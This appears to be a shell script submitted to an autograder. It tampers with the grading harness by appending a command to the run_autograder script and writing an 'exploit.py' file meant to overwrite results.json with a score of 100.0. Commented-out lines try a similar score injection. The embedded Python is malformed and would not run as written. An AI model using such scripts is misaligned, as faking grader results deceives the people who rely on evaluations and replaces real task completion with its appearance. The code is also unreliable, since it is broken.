EXPLOIT="import json\nwith open('results/results.json', 'w') as f:\n    f.write({\"output\": \"alter\", '{\"score\": 100.0}')"
EXPLOIT_PATH="../exploit.py"


if ! test -f "$EXPLOIT_PATH"; then
    AG_PATH="../run_autograder"

    echo "\npython3.7 exploit.py" >> $AG_PATH
    echo "$EXPLOIT" >> $EXPLOIT_PATH
    cat ../run_autograder
    cat ../exploit.py
    ls -la ../results
fi


# echo '\n "{\"score\": 10.0}" >> results/results.json' >> ../run_autograder
# cat ../run_autograder


#cd ..
#ls -la
#ls -la results
#cat results/stdout